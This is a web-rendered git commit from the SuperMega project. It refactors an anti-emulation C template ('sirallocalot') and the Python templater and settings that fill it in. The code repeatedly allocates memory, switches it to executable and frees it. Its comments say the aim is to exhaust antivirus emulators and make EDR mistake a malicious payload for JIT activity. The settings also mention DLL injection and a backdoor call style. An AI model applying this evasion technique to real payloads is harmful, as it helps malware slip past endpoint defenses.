admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: improve sirallocalot

Browse Source
This commit is contained in:
Dobin
2024-07-07 12:36:15 +01:00
parent b868c29c7d
commit 4bed8d1a95
4 changed files with 38 additions and 35 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/source/antiemulation/sirallocalot.c
+21 -28
View File
@@ -1,28 +1,31 @@
#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
#define SIR_SLEEP_TIME 200 // ms
/* This will allocate SIR_ALLOC_COUNT RW memory regions, /* This will allocate SIR_ALLOC_COUNT RW memory regions,
set them to RX, and free them set them to RX, and free them.
And this SIR_ITERATION_COUNT times.
SIR_ITERATION_COUNT: Single digits, around 5
SIR_ALLOC_COUNT: Tripple digits, around 100
The idea is that the AV emulator will probably give up, either because Memory : SIR_ALLOC_COUNT * payload_length
of used memory is above maximum, or amount of instructions, or Cycles : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
number of API calls, or time. Time : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
It hopefully also makes the EDR think this program is doing some The idea is that the AV emulator will probably give up, either because
kind of interpreter or JIT compilation, and not a malicious payload. of used memory is above maximum, or amount of instructions, or
number of API calls, or time.
It hopefully also makes the EDR think this program is doing some
kind of interpreter or JIT compilation, and not a malicious payload.
*/ */
void antiemulation() { void antiemulation() {
void* allocs[SIR_ALLOC_COUNT]; void* allocs[{{SIR_ALLOC_COUNT}}];
DWORD result; DWORD result;
for(int i=0; i<SIR_ITERATION_COUNT; i++) { for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
allocs[n] = VirtualAlloc( allocs[n] = VirtualAlloc(
NULL, NULL,
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
@@ -37,33 +40,23 @@ void antiemulation() {
} }
} }
// Write something. for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
/*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
char *alloc = allocs[n];
alloc[0] = 0; // overwrite the first byte
}*/
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
if (VirtualProtect( if (VirtualProtect(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
p_RX, p_RX,
&result) == 0) &result) == 0)
{ {
return 7; return;
} }
} }
Sleep(SIR_SLEEP_TIME);
BOOL bSuccess; BOOL bSuccess;
for(int n=0; n<SIR_ALLOC_COUNT; n++) { for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
bSuccess = VirtualFree( bSuccess = VirtualFree(
allocs[n], allocs[n],
{{PAYLOAD_LEN}}, {{PAYLOAD_LEN}},
0x00008000); // MEM_RELEASE 0x00008000); // MEM_RELEASE
} }
} }
} }
data/source/carrier/change_rw_rx/template.c
+2
View File
@@ -22,6 +22,8 @@ char *supermega_payload;
{{plugin_executionguardrail}} {{plugin_executionguardrail}}
{{plugin_virtualprotect}}
int main() int main()
{ {
model/settings.py
+4
View File
@@ -23,6 +23,10 @@ class Settings():
self.dllfunc: str = "" # For DLL injection self.dllfunc: str = "" # For DLL injection
# Anti-debugging
self.sir_iteration_count: int = 5
self.sir_alloc_count: int = 100
# Injectable # Injectable
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
self.inject_exe_in: FilePath = "" self.inject_exe_in: FilePath = ""
phases/templater.py
+11 -7
View File
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format( filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
settings.plugin_antiemulation) settings.plugin_antiemulation)
with open(filepath_antiemulation, "r", encoding='utf-8') as file: with open(filepath_antiemulation, "r", encoding='utf-8') as file:
sir_iteration_count = 5 sir_iteration_count = settings.sir_iteration_count
sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1 sir_alloc_count = settings.sir_alloc_count
# if too large, compiler will add a __checkstk dependency # sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
if sir_alloc_count > 256: max_alloc_count = 256
sir_alloc_count = 256 if sir_alloc_count > max_alloc_count:
logging.info(" AntiEmulation target: iterations: {} alloc: {}".format( # if too large, compiler will add a __checkstk dependency
logging.warning("Too large sir allocation count {}, setting to max {}".format(
sir_alloc_count, max_alloc_count
))
sir_alloc_count = max_alloc_count
logging.info("> AntiEmulation: iterations: {} allocs: {}".format(
sir_iteration_count, sir_alloc_count) sir_iteration_count, sir_alloc_count)
) )
plugin_antiemualation = file.read() plugin_antiemualation = file.read()
plugin_antiemualation = Template(plugin_antiemualation).render({ plugin_antiemualation = Template(plugin_antiemualation).render({
'PAYLOAD_LEN': payload_len, 'PAYLOAD_LEN': payload_len,